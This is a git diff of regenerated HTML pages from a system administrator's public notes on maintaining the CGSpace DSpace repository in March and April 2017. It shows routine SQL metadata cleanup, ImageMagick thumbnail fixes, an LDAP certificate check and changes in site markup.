<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16856 -p &#34;ImageMagick PDF Thumbnail&#34;
File: earlywinproposal_esa_postharvest.pdf.jpg
FILTERED: bitstream 13787 (item: 10568/16881) and created 'earlywinproposal_esa_postharvest.pdf.jpg'
FILTERED: bitstream 13787 (item: 10568/16881) and created &#39;earlywinproposal_esa_postharvest.pdf.jpg&#39;
File: postHarvest.jpg.jpg
FILTERED: bitstream 16524 (item: 10568/24655) and created 'postHarvest.jpg.jpg'
FILTERED: bitstream 16524 (item: 10568/24655) and created &#39;postHarvest.jpg.jpg&#39;
</code></pre><ul>
<li>According to <code>dspace.cfg</code> the ImageMagick PDF Thumbnail plugin should only process PDFs:</li>
</ul>
<pre><code>filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
<pre tabindex="0"><code>filter.org.dspace.app.mediafilter.ImageMagickImageThumbnailFilter.inputFormats = BMP, GIF, image/png, JPG, TIFF, JPEG, JPEG 2000
filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = Adobe PDF
</code></pre><ul>
<li>I&rsquo;ve sent a message to the mailing list and might file a Jira issue</li>
@ -317,8 +316,8 @@ filter.org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.inputFormats = A
<ul>
<li>Find all fields with &ldquo;<a href="http://hdl.handle.net">http://hdl.handle.net</a>&rdquo; values (most are in <code>dc.identifier.uri</code>, but some are in other URL-related fields like <code>cg.link.reference</code>, <code>cg.identifier.dataurl</code>, and <code>cg.identifier.url</code>):</li>
</ul>
<pre><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like 'http://hdl.handle.net%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like 'http://hdl.handle.net%';
<pre tabindex="0"><code>dspace=# select distinct metadata_field_id from metadatavalue where resource_type_id=2 and text_value like &#39;http://hdl.handle.net%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://hdl.handle.net&#39;, &#39;https://hdl.handle.net&#39;) where resource_type_id=2 and metadata_field_id IN (25, 113, 179, 219, 220, 223) and text_value like &#39;http://hdl.handle.net%&#39;;
UPDATE 58633
</code></pre><ul>
<li>This works but I&rsquo;m thinking I&rsquo;ll wait on the replacement as there are perhaps some other places that rely on <code>http://hdl.handle.net</code> (grep the code, it&rsquo;s scary how many things are hard coded)</li>
@ -328,7 +327,7 @@ UPDATE 58633
<ul>
<li>LDAP users cannot log in today, looks to be an issue with CGIAR&rsquo;s LDAP server:</li>
</ul>
<pre><code>$ openssl s_client -connect svcgroot2.cgiarad.org:3269
<pre tabindex="0"><code>$ openssl s_client -connect svcgroot2.cgiarad.org:3269
CONNECTED(00000003)
depth=0 CN = SVCGROOT2.CGIARAD.ORG
verify error:num=20:unable to get local issuer certificate
@ -345,7 +344,7 @@ Certificate chain
<li>For some reason it is now signed by a private certificate authority</li>
<li>This error seems to have started on 2017-02-25:</li>
</ul>
<pre><code>$ grep -c &quot;unable to find valid certification path&quot; [dspace]/log/dspace.log.2017-02-*
<pre tabindex="0"><code>$ grep -c &#34;unable to find valid certification path&#34; [dspace]/log/dspace.log.2017-02-*
[dspace]/log/dspace.log.2017-02-01:0
[dspace]/log/dspace.log.2017-02-02:0
[dspace]/log/dspace.log.2017-02-03:0
@ -381,7 +380,7 @@ Certificate chain
<li>The problem likely lies in the logic of <code>ImageMagickThumbnailFilter.java</code>, as <code>ImageMagickPdfThumbnailFilter.java</code> extends it</li>
<li>Run CIAT corrections on CGSpace</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
</code></pre><ul>
<li>CGNET has fixed the certificate chain on their LDAP server</li>
<li>Redeploy CGSpace and DSpace Test to on latest <code>5_x-prod</code> branch with fixes for LDAP bind user</li>
@ -393,16 +392,16 @@ Certificate chain
<li>Ah, this is probably because some items have the <code>International Center for Tropical Agriculture</code> author twice, which I first noticed in 2016-12 but couldn&rsquo;t figure out how to fix</li>
<li>I think I can do it by first exporting all metadatavalues that have the author <code>International Center for Tropical Agriculture</code></li>
</ul>
<pre><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='International Center for Tropical Agriculture') to /tmp/ciat.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select resource_id, metadata_value_id from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;International Center for Tropical Agriculture&#39;) to /tmp/ciat.csv with csv;
COPY 1968
</code></pre><ul>
<li>And then use awk to print the duplicate lines to a separate file:</li>
</ul>
<pre><code>$ awk -F',' 'seen[$1]++' /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
<pre tabindex="0"><code>$ awk -F&#39;,&#39; &#39;seen[$1]++&#39; /tmp/ciat.csv &gt; /tmp/ciat-dupes.csv
</code></pre><ul>
<li>From that file I can create a list of 279 deletes and put them in a batch script like:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and metadata_value_id=2742061;
</code></pre>
@ -424,15 +423,15 @@ COPY 1968
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -54,7 +54,7 @@ Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing reg
$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600&#43;0&#43;0 8-bit CMYK 168KB 0.000u 0:00.000
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -84,12 +84,12 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -136,7 +136,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<time datetime="2017-03-01T17:08:52+02:00">Wed Mar 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -156,7 +156,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Discovered that the ImageMagic <code>filter-media</code> plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK</li>
<li>Interestingly, it seems DSpace 4.x&rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see <a href="https://cgspace.cgiar.org/handle/10568/51999">10568/51999</a>):</li>
</ul>
<pre><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
<pre tabindex="0"><code>$ identify ~/Desktop/alc_contrastes_desafios.jpg
/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
</code></pre><ul>
<li>This results in discolored thumbnails when compared to the original PDF, for example sRGB and CMYK:</li>
@ -171,7 +171,7 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>I created a patch for DS-3517 and made a pull request against upstream <code>dspace-5_x</code>: <a href="https://github.com/DSpace/DSpace/pull/1669">https://github.com/DSpace/DSpace/pull/1669</a></li>
<li>Looks like <code>-colorspace sRGB</code> alone isn&rsquo;t enough, we need to use profiles:</li>
</ul>
<pre><code>$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
<pre tabindex="0"><code>$ convert alc_contrastes_desafios.pdf\[0\] -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_cmyk.icc -thumbnail 300x300 -flatten -profile /opt/brew/Cellar/ghostscript/9.20/share/ghostscript/9.20/iccprofiles/default_rgb.icc alc_contrastes_desafios.pdf.jpg
</code></pre><ul>
<li>This reads the input file, applies the CMYK profile, applies the RGB profile, then writes the file</li>
<li>Note that you should set the first profile immediately after the input file</li>
@ -180,9 +180,9 @@ $ identify ~/Desktop/alc_contrastes_desafios.jpg
<li>Somehow we need to detect the color system being used by the input file and handle each case differently (with profiles)</li>
<li>This is trivial with <code>identify</code> (even by the <a href="http://im4java.sourceforge.net/api/org/im4java/core/IMOps.html#identify">Java ImageMagick API</a>):</li>
</ul>
<pre><code>$ identify -format '%r\n' alc_contrastes_desafios.pdf\[0\]
<pre tabindex="0"><code>$ identify -format &#39;%r\n&#39; alc_contrastes_desafios.pdf\[0\]
DirectClass CMYK
$ identify -format '%r\n' Africa\ group\ of\ negotiators.pdf\[0\]
$ identify -format &#39;%r\n&#39; Africa\ group\ of\ negotiators.pdf\[0\]
DirectClass sRGB Alpha
</code></pre><h2 id="2017-03-04">2017-03-04</h2>
<ul>
@ -196,7 +196,7 @@ DirectClass sRGB Alpha
<li>They want something like the items that are returned by the general &ldquo;LAND&rdquo; query in the search interface, but we cannot do that</li>
<li>We can only return specific results for metadata fields, like:</li>
</ul>
<pre><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;LAND REFORM&quot;, &quot;language&quot;: null}' | json_pp
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://dspacetest.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;LAND REFORM&#34;, &#34;language&#34;: null}&#39; | json_pp
</code></pre><ul>
<li>But there are hundreds of combinations of fields and values (like <code>dc.subject</code> and all the center subjects), and we can&rsquo;t use wildcards in REST!</li>
<li>Reading about enabling multiple handle prefixes in DSpace</li>
@ -204,7 +204,7 @@ DirectClass sRGB Alpha
<li>And a comment from Atmire&rsquo;s Bram about it on the DSpace wiki: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296">https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296</a></li>
<li>Bram mentions an undocumented configuration option <code>handle.plugin.checknameauthority</code>, but I noticed another one in <code>dspace.cfg</code>:</li>
</ul>
<pre><code># List any additional prefixes that need to be managed by this handle server
<pre tabindex="0"><code># List any additional prefixes that need to be managed by this handle server
# (as for examle handle prefix coming from old dspace repository merged in
# that repository)
# handle.additional.prefixes = prefix1[, prefix2]
@ -212,23 +212,23 @@ DirectClass sRGB Alpha
<li>Because of this I noticed that our Handle server&rsquo;s <code>config.dct</code> was potentially misconfigured!</li>
<li>We had some default values still present:</li>
</ul>
<pre><code>&quot;300:0.NA/YOUR_NAMING_AUTHORITY&quot;
<pre tabindex="0"><code>&#34;300:0.NA/YOUR_NAMING_AUTHORITY&#34;
</code></pre><ul>
<li>I&rsquo;ve changed them to the following and restarted the handle server:</li>
</ul>
<pre><code>&quot;300:0.NA/10568&quot;
<pre tabindex="0"><code>&#34;300:0.NA/10568&#34;
</code></pre><ul>
<li>In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk</li>
<li>From <code>dspace/config/crosswalks/google-metadata.properties</code>:</li>
</ul>
<pre><code>google.citation_doi = cg.identifier.doi
<pre tabindex="0"><code>google.citation_doi = cg.identifier.doi
</code></pre><ul>
<li>This works, and makes DSpace output the following metadata on the item view page:</li>
</ul>
<pre><code>&lt;meta content=&quot;https://dx.doi.org/10.1186/s13059-017-1153-y&quot; name=&quot;citation_doi&quot;&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;https://dx.doi.org/10.1186/s13059-017-1153-y&#34; name=&#34;citation_doi&#34;&gt;
</code></pre><ul>
<li>Submitted and merged pull request for this: <a href="https://github.com/ilri/DSpace/pull/305">https://github.com/ilri/DSpace/pull/305</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&quot;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&rdquo;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>I want to show it briefly to Abenet and Peter to get feedback</li>
</ul>
<h2 id="2017-03-06">2017-03-06</h2>
@ -260,18 +260,18 @@ DirectClass sRGB Alpha
<ul>
<li>Export list of sponsors so Peter can clean it up:</li>
</ul>
<pre><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;) group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
COPY 285
</code></pre><h2 id="2017-03-12">2017-03-12</h2>
<ul>
<li>Test the sponsorship fixes and deletes from Peter:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
$ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Generate a new list of unique sponsors so we can update the controlled vocabulary:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;)) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>Pull request for controlled vocabulary if Peter approves: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
<li>Review Sisay&rsquo;s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: <a href="https://github.com/ilri/DSpace/pull/307">https://github.com/ilri/DSpace/pull/307</a></li>
@ -311,12 +311,12 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>CCAFS said they are ready for the flagship updates for Phase II to be run (<code>cg.subject.ccafs</code>), so I ran them on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>We&rsquo;ve been waiting since February to run these</li>
<li>Also, I generated a list of all CCAFS flagships because there are a dozen or so more than there should be:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
</code></pre><ul>
<li>I sent a list to CCAFS people so they can tell me if some should be deleted or moved, etc</li>
<li>Test, squash, and merge Sisay&rsquo;s RTB theme into <code>5_x-prod</code>: <a href="https://github.com/ilri/DSpace/pull/316">https://github.com/ilri/DSpace/pull/316</a></li>
@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>Dump a list of fields in the DC and CG schemas to compare with CG Core:</li>
</ul>
<pre><code>dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then &#39;dc&#39; else &#39;cg&#39; end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><ul>
<li>Ooh, a better one!</li>
</ul>
<pre><code>dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then &#39;dc.&#39; else &#39;cg.&#39; end) || concat_ws(&#39;.&#39;, element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><h2 id="2017-03-30">2017-03-30</h2>
<ul>
<li>Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150190%, so this should make the alerts less regular</li>
@ -355,15 +355,15 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-04/" />
@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -70,12 +70,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -122,7 +122,7 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -136,16 +136,16 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-03">2017-04-03</h2>
<ul>
<li>Continue testing the CMYK patch on more communities:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
</code></pre><ul>
<li>So far there are almost 500:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
484
</code></pre><ul>
<li>Looking at the CG Core document again, I&rsquo;ll send some feedback to Peter and Abenet:
@ -157,39 +157,39 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
</li>
<li>Also, I&rsquo;m noticing some weird outliers in <code>cg.coverage.region</code>, need to remember to go correct these later:</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
</code></pre><h2 id="2017-04-04">2017-04-04</h2>
<ul>
<li>The <code>filter-media</code> script has been running on more large communities and now there are many more CMYK PDFs that have been fixed:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
1584
</code></pre><ul>
<li>Trying to find a way to get the number of items submitted by a certain user in 2016</li>
<li>It&rsquo;s not possible in the DSpace search / module interfaces, but might be able to be derived from <code>dc.description.provenance</code>, as that field contains the name and email of the submitter/approver, ie:</li>
</ul>
<pre><code>Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
<pre tabindex="0"><code>Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
No. of bitstreams: 1^M
ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0 (MD5)
</code></pre><ul>
<li>This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a &ldquo;checksum&rdquo; (ie, there was a bitstream in the submission):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>Then this one does the same, but for fields that don&rsquo;t contain checksums (ie, there was no bitstream in the submission):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*&#39; and text_value !~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.</li>
<li>It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled&hellip;</li>
<li>In that case it might just be better to see how many the user submitted (both <em>with</em> and <em>without</em> bitstreams):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*giampieri.*2016-.*&#39;;
</code></pre><h2 id="2017-04-05">2017-04-05</h2>
<ul>
<li>After doing a few more large communities it seems this is the final count of CMYK PDFs:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
2505
</code></pre><h2 id="2017-04-06">2017-04-06</h2>
<ul>
@ -260,7 +260,7 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
<li>I will have to check the OAI cron scripts on DSpace Test, and then run them on CGSpace</li>
<li>Running <code>dspace oai import</code> and <code>dspace oai clean-cache</code> have zero effect, but this seems to rebuild the cache from scratch:</li>
</ul>
<pre><code>$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
<pre tabindex="0"><code>$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
...
63900 items imported so far...
64000 items imported so far...
@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
<li>The import command should theoretically catch situations like this where an item&rsquo;s metadata was updated, but in this case we changed the metadata schema and it doesn&rsquo;t seem to catch it (could be a bug!)</li>
<li>Attempting a full rebuild of OAI on CGSpace:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
